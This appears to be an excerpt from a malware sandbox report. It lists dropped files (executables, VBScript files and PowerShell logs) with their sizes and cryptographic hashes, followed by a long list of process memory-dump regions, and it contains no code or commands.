C:\ProgramData\Drivers\setup.exe

Filesize
26KB

MD5
d973b4acb8605075c0232164cee1cf0f

SHA1
492f3465da09ad2995ef52f204207fa39f6e7592

SHA256
1671d437c495b0484bc9c1623aa7ed3707f407214763294e875870698dee8da1

SHA512
f02b53252c436cb490eedc559f2dcd60a839215625d6fa3bb690246f0d5259388df712caa811236ecb92928d631539a0a6810875753597d53b259302d96b8be2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
87147989986a378d40218a222b7f87bc

SHA1
e23cc67ae5281e5a35cc054e71376048e1b2ae3a

SHA256
c8e95907f8bdd3dd05ae85d88be2af5cacd82e90e3db16feeed33b988612d345

SHA512
ba84b7a595253b8e579212675d60e9e8fbfbc20c7a347307ac324633a960f1a15c87e4b9b4c60ae8f3ba9df3bf8feaa11132e470939a5fbd5aecd53727bdac0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
7859d9a8cee5a8f075eda7b950b720b3

SHA1
d9db2ea3a98161572bde11a0390c8e876dd61ede

SHA256
ae6d53cab51e1ac47ea7a85bd66a592b25ac8233fcaafc782f248587adfb3f83

SHA512
8d5e3e83fa0fe6de80e2908a813fc8ec40d0b05dc399898d738132a956fd4689ea6e1b4379244abc8b50877a25ec96619296472a5e636c2c2b82e582b3ec3dfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
a8c691aa4bcf067aede716ce85a05b3e

SHA1
90a717c7704c4ff41399bcd6a64479a112474e38

SHA256
72d31e2d3e9c019252b03920386f98dc332e3a9c5b88c419aeb8010c10ce6b0d

SHA512
d96dfa666250d21774c00f3a056ac3b64f10447fd38c2d34a420cfdb488a5f60658c7db8be328a69da9d11680de260c27f77102e46f3418b1b2f58dd38783bc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
dff90b4998ca4ccaba6b2044848b97df

SHA1
4ff91818904a18fb33c522464f992ce5755a523d

SHA256
517142a7f972c89dec9a17d236707dc774e38a2c2c5db964e2192c68fb2a0f3e

SHA512
61c47137869fdd08577c7a9284647fb5b93371c27855b49b1b1fcbe0718317f595214dd71c556b2df9397a0d40d4f1e3f5aec108ee73906784975bb35156b1f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
481268afa5fb868604fe4c3c3e88c2b1

SHA1
a1f7c763d1579bf372cab87a33d17cce0d0bda37

SHA256
bc50c49b68b78d73332ce308ed6a82653fa91359873a320671005b5e6bffa387

SHA512
df1d3fece79ddd10be5adbe582725d605b00712e37ea1d2e4f4a8984030c1703baa95386556f5a94d492599474385150b324b496a5de2656c9e6f6abdc8a886f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
b1617a3d64662ee3fcb1d321506d01de

SHA1
a8e176d3fefc550d8d4626e2bd8e0cc9ed3a4e59

SHA256
502da653ec4088b84722220fa3473809658140321182ff384702cf72c7f27a17

SHA512
0fe744d2b0aaaa318cde71cabdbc709aeed9f149039d7af3062e47192f77202760e281c6240e564147bf81c3ed5157123bef1d400387f8c0367694c9ba6942ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
af1d8f62e7ab0254190e4e511e696f66

SHA1
0ad72a48858d644ace293cb0625f743391df2c87

SHA256
064b13a45a5cacdda6528ab6afa28de823a364f888253398941eeb90bf3fd030

SHA512
670388fbff2deb3712f602af907d9166a9ead4ce191b2ab2a38bf0a897b0e75980c1536843de74cbde9e40edc4ae112800932d469779c4d112af895ab3f8c069

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
6ac8e5b6c71123ee859430127e24320c

SHA1
ab4bc258ff28eb954c38a5336279516f68db5048

SHA256
99a28175eff5b06fc3331d0becff1e5a5ae1e61e42845c9a818e971b76b0234b

SHA512
ecff133b90ca98739475a1d1db0db2db1d80eaf2b683ea159f1a0fd079bbcd656f1f7d2a6527ee5cc38347e69526b8bd7ef16c51d69e773c12fc71c9d531245a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
1ecbb8ebea28efc08b751763e66bfc3b

SHA1
5c1bf0056467e51a852db7c80a44ad0933a4a9a2

SHA256
c986c27cbd718245cc7ccf0a46aef3663058103f0956fe5a738caf699dcc0472

SHA512
be4c5de761b6fe1a5c9792190374f0666c830b87e880d7c82c1946ecf3a2dfa84160591ef5f0adaf004245fa81134c286a9e82827d1392a4af561ec0026f351f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
2c3b843328016c34c24ab413d553f2a7

SHA1
4a7b98e5671951ea081cdbd85c4c084de8a3f893

SHA256
4b6d07457b1ba3455283018ac34cd2014d7d33204fe43791b470d9adddb09fdb

SHA512
1f249375e853e65bde1eab939992c6c6c6ee0667b6a6eb5f0768ac810bd5ef001ab49e9ed57a00c388235fb94d75341639e8794cd882fe783747704438f672a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Temp\_Ameylvsm.vbs

Filesize
189B

MD5
1ed73b114c060dcb75682a05bd245d4b

SHA1
227f8250fa984381bdf6690b68b963adcf907316

SHA256
084e8dd8d5266b0bfdb457eca5162487e24c09865889f636602b1a570a2e40a4

SHA512
863904c36a276e94e309e15d1d08df581de5ba9edb7b9e2d267470e2e56111fd02feaf09e6c6672885e45c79a67cf52b482995ba7438e55d54ad6936e06ba133

Download Submit
C:\Users\Admin\AppData\Local\Temp\_Iiimxlbvhldknlde.vbs

Filesize
191B

MD5
2dfeb4c30a6a484caded9a71b2615b91

SHA1
98376e481a535f91c80d994ecb5fd4d9063bec70

SHA256
3c3682ef921c28b43225226682c1233196b98600fc68054c874e99babcb71e10

SHA512
c34a5ed6a5018e314b89ec540ecd2790ec74a9c1b2fdcbc5ea406453ea5446ff4bdfaf672edef7e568a96366f249d1aea5e922028cfa97aac29584bc66a8da75

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zrnzqxlq.1vd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\process.exe

Filesize
1.1MB

MD5
fdb924f1c7b25669f1fcb1faad074bbd

SHA1
c23850fba792a6274602cdbf1c9573a4771b998d

SHA256
ac9248a09563184fff597f896931bde09df08f47f157cdbde9d570b84f92736e

SHA512
671ca64788c6c63c1aaa010593367768c9042600a35ce82708f18a1315b2e6b1d98aff8b427fa32511741f872dd5b30ff9e81dee706715f0b35a59ea3c6d7607

Download Submit
C:\Users\Admin\AppData\Local\Temp\process.exe

Filesize
2.6MB

MD5
aca4441812b21e36ddf966d04044877c

SHA1
97532f19fd0b984c95b51e1936d20c5732b2609a

SHA256
e7819f61c11c9a233dac2aba211ccc28ea26bd6df260baa937e24900d0cbb09c

SHA512
259d647b93895c61f7b81a12bc0f2a331bfb3fb930c39e6eea8e0c0f9025dde0a9c90472a66b455998c66eeb2d8ae76054da2acf275af89e6e856d8f93cf3fb8

Download Submit
memory/8-169-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/8-170-0x0000000004A30000-0x0000000004A40000-memory.dmp

Filesize
64KB

Download
memory/8-171-0x0000000004A30000-0x0000000004A40000-memory.dmp

Filesize
64KB

Download
memory/8-181-0x0000000005820000-0x0000000005B74000-memory.dmp

Filesize
3.3MB

Download
memory/8-183-0x000000007F300000-0x000000007F310000-memory.dmp

Filesize
64KB

Download
memory/8-184-0x000000006FE60000-0x000000006FEAC000-memory.dmp

Filesize
304KB

Download
memory/8-194-0x0000000004A30000-0x0000000004A40000-memory.dmp

Filesize
64KB

Download
memory/8-196-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/1276-168-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/1276-157-0x000000006FE60000-0x000000006FEAC000-memory.dmp

Filesize
304KB

Download
memory/1276-154-0x00000000026A0000-0x00000000026B0000-memory.dmp

Filesize
64KB

Download
memory/1276-141-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/2500-100-0x0000000007100000-0x000000000711A000-memory.dmp

Filesize
104KB

Download
memory/2500-67-0x0000000004C40000-0x0000000004C50000-memory.dmp

Filesize
64KB

Download
memory/2500-102-0x0000000007360000-0x00000000073F6000-memory.dmp

Filesize
600KB

Download
memory/2500-103-0x00000000072F0000-0x0000000007301000-memory.dmp

Filesize
68KB

Download
memory/2500-104-0x0000000007320000-0x000000000732E000-memory.dmp

Filesize
56KB

Download
memory/2500-105-0x0000000007330000-0x0000000007344000-memory.dmp

Filesize
80KB

Download
memory/2500-106-0x0000000007420000-0x000000000743A000-memory.dmp

Filesize
104KB

Download
memory/2500-107-0x0000000007410000-0x0000000007418000-memory.dmp

Filesize
32KB

Download
memory/2500-110-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/2500-99-0x0000000007780000-0x0000000007DFA000-memory.dmp

Filesize
6.5MB

Download
memory/2500-64-0x0000000002490000-0x00000000024C6000-memory.dmp

Filesize
216KB

Download
memory/2500-101-0x0000000007170000-0x000000000717A000-memory.dmp

Filesize
40KB

Download
memory/2500-65-0x0000000005280000-0x00000000058A8000-memory.dmp

Filesize
6.2MB

Download
memory/2500-81-0x0000000005A70000-0x0000000005DC4000-memory.dmp

Filesize
3.3MB

Download
memory/2500-98-0x0000000007050000-0x00000000070F3000-memory.dmp

Filesize
652KB

Download
memory/2500-66-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/2500-68-0x0000000004C40000-0x0000000004C50000-memory.dmp

Filesize
64KB

Download
memory/2500-96-0x0000000006340000-0x000000000635E000-memory.dmp

Filesize
120KB

Download
memory/2500-69-0x0000000004E10000-0x0000000004E32000-memory.dmp

Filesize
136KB

Download
memory/2500-70-0x00000000050B0000-0x0000000005116000-memory.dmp

Filesize
408KB

Download
memory/2500-97-0x0000000004C40000-0x0000000004C50000-memory.dmp

Filesize
64KB

Download
memory/2500-80-0x0000000005A00000-0x0000000005A66000-memory.dmp

Filesize
408KB

Download
memory/2500-86-0x000000006FE60000-0x000000006FEAC000-memory.dmp

Filesize
304KB

Download
memory/2500-84-0x0000000006360000-0x0000000006392000-memory.dmp

Filesize
200KB

Download
memory/2500-85-0x000000007F8D0000-0x000000007F8E0000-memory.dmp

Filesize
64KB

Download
memory/2500-83-0x0000000005DF0000-0x0000000005E3C000-memory.dmp

Filesize
304KB

Download
memory/2500-82-0x00000000059E0000-0x00000000059FE000-memory.dmp

Filesize
120KB

Download
memory/2708-113-0x0000000004660000-0x0000000004670000-memory.dmp

Filesize
64KB

Download
memory/2708-114-0x0000000004660000-0x0000000004670000-memory.dmp

Filesize
64KB

Download
memory/2708-140-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/2708-112-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download
memory/2708-126-0x000000007F3C0000-0x000000007F3D0000-memory.dmp

Filesize
64KB

Download
memory/2708-127-0x000000006FE60000-0x000000006FEAC000-memory.dmp

Filesize
304KB

Download
memory/2708-121-0x00000000055B0000-0x0000000005904000-memory.dmp

Filesize
3.3MB

Download
memory/4092-142-0x0000000000D20000-0x0000000000D30000-memory.dmp

Filesize
64KB

Download
memory/4092-138-0x00007FFCD59A0000-0x00007FFCD6341000-memory.dmp

Filesize
9.6MB

Download
memory/4092-62-0x00007FFCD59A0000-0x00007FFCD6341000-memory.dmp

Filesize
9.6MB

Download
memory/4092-55-0x00007FFCD59A0000-0x00007FFCD6341000-memory.dmp

Filesize
9.6MB

Download
memory/4092-56-0x000000001BDB0000-0x000000001BE4C000-memory.dmp

Filesize
624KB

Download
memory/4092-54-0x000000001BC60000-0x000000001BD06000-memory.dmp

Filesize
664KB

Download
memory/4092-52-0x000000001B790000-0x000000001BC5E000-memory.dmp

Filesize
4.8MB

Download
memory/4092-51-0x0000000000D20000-0x0000000000D30000-memory.dmp

Filesize
64KB

Download
memory/4148-149-0x000000001CD50000-0x000000001CD60000-memory.dmp

Filesize
64KB

Download
memory/4148-349-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-48-0x0000000000C20000-0x0000000001104000-memory.dmp

Filesize
4.9MB

Download
memory/4148-49-0x00007FFCD4ED0000-0x00007FFCD5991000-memory.dmp

Filesize
10.8MB

Download
memory/4148-336-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-61-0x000000001CD50000-0x000000001CD60000-memory.dmp

Filesize
64KB

Download
memory/4148-337-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-137-0x00007FFCD4ED0000-0x00007FFCD5991000-memory.dmp

Filesize
10.8MB

Download
memory/4148-341-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-396-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-345-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-372-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-353-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-392-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-388-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-357-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-384-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-360-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-363-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-381-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-368-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4148-377-0x000000001DC00000-0x000000001DC7A000-memory.dmp

Filesize
488KB

Download
memory/4496-367-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-395-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-378-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-332-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-364-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-382-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-358-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-387-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-350-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-391-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-354-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-371-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-346-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-156-0x0000000001100000-0x0000000001110000-memory.dmp

Filesize
64KB

Download
memory/4496-143-0x00007FFCD4ED0000-0x00007FFCD5991000-memory.dmp

Filesize
10.8MB

Download
memory/4496-342-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-338-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4496-60-0x00007FFCD4ED0000-0x00007FFCD5991000-memory.dmp

Filesize
10.8MB

Download
memory/4496-50-0x0000000000410000-0x000000000075C000-memory.dmp

Filesize
3.3MB

Download
memory/4496-334-0x000000001E480000-0x000000001E4E9000-memory.dmp

Filesize
420KB

Download
memory/4800-197-0x0000000073500000-0x0000000073CB0000-memory.dmp

Filesize
7.7MB

Download